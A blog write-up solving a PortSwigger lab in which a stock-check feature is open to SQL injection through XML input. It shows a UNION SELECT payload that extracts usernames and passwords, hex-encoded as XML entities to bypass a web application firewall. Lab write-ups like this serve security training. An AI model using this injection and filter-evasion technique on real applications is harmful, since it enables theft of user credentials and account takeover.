Portswigger’s SQL Injection Lab Solution | Karthikeyan Nagaraj

Lab Description:

• This lab contains a SQL injection vulnerability in its stock check feature. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables.
• The database contains a users table, which contains the usernames and passwords of registered users.
• To solve the lab, perform a SQL injection attack to retrieve the admin user’s credentials, then log in to their account.

HINT
A web application firewall (WAF) will block requests that contain obvious signs of a SQL injection attack. You’ll need to find a way to obfuscate your malicious query to bypass this filter. We recommend using the Hackvertor extension to do this.

Analysis:

1. Observer that the Parameters ProductId and StockID are Sent in Xml Format

<?xml version="1.0" encoding="UTF-8"?>
   <stockCheck>
       <productId>
        1
       </productId>
       <storeId>
        1
       </storeId>
   </stockCheck>

2. Send the Request to Repeater

3. In Burp Repeater, probe the storeId to see whether your input is evaluated. For example, try replacing the ID with mathematical expressions that evaluate to other potential IDs, for example:<storeId>1+1</storeId>

4. Observe that your input appears to be evaluated by the application, returning the stock for different stores.

5. As you’re injecting into XML, try obfuscating your payload using XML entities

6. One way to do this is using the Hackvertor extension.

7. Just highlight your input, right-click, then select Extensions > Hackvertor > Encode > dec_entities/hex_entities

8. Let’s Inject a Query with the Below payload into the storeId

<@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities>

The Above code will display the usernames and passwords from the table users

Feel Free to Ask Queries via LinkedIn and to Buy me a Coffee : )

Thank you for Reading!!

Happy Hunting ~

Author : karthikeyan Nagaraj ~ Cyberw1ng